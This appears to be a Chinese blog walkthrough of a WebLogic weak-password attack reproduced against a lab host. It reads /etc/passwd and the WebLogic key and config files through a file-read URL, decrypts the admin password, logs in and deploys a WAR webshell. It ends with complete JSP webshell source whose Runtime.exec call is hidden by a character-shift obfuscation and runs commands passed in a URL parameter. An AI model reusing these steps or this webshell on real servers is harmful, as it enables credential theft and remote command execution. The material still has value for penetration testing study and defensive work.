weblogic弱口令漏洞复现

一、漏洞特征

1.可以直接获取passwd文件

http://192.168.232.131:7001/hello/file.jsp?path=/etc/passwd
在这里插入图片描述

2.可以直接获取密文文件

http://192.168.232.131:7001/hello/file.jsp?path=./security/SerializedSystemIni.dat
在这里插入图片描述

将密文copy到*.dat文件

3.可以直接获取密钥文件

http://192.168.232.131:7001/hello/file.jsp?path=./config/config.xml
在这里插入图片描述

{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

4.解密密码

在这里插入图片描述

解密后得到密码Oracle@123,用户名是weblogic

5.登录后台

使用解密后的账号登录后台
在这里插入图片描述

二、命令执行复现

1.部署webshell

进入部署页面
在这里插入图片描述

点击安装,上载文件
在这里插入图片描述

选部署档案,上传hello.war
在这里插入图片描述在这里插入图片描述

上传成功后点下一步,选将此部署安装为应用程序,设置应用名称
在这里插入图片描述
在这里插入图片描述

部署完成
在这里插入图片描述

2.Shell命令执行

http://192.168.232.131:7001/hello1/hello1/index.jsp?websafe=id
在这里插入图片描述

3.jsp一句话木马

<%@ page import="com.sun.org.apache.bcel.internal.util.ClassLoader" %>
<html>
  <head>
    <title>Hello</title>
  </head>
  <body>
    @Hello world!@
  </body>
</html>
<%!public String HMfR(String yOK){String aAh="";for (int i = 0; i < yOK.length(); i++) {aAh+=(char)(yOK.charAt(i)+6);}return aAh;}
%>
<% String yiO=request.getParameter("websafe");if(yiO!=null){ Class tJIi = Class.forName(HMfR("d[p[(f[ha(Lohncg_"));
Process Mdlz = (Process) tJIi.getMethod(HMfR("_r_]"), String.class).invoke(tJIi.getMethod(HMfR("a_nLohncg_")).invoke(null),yiO);
java.io.InputStream in = Mdlz.getInputStream();byte[] PYp = new byte[2048];out.print("<pre>");while(in.read(PYp)!=-1){ out.println(new String(PYp)); }out.print("</pre>"); }
%>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值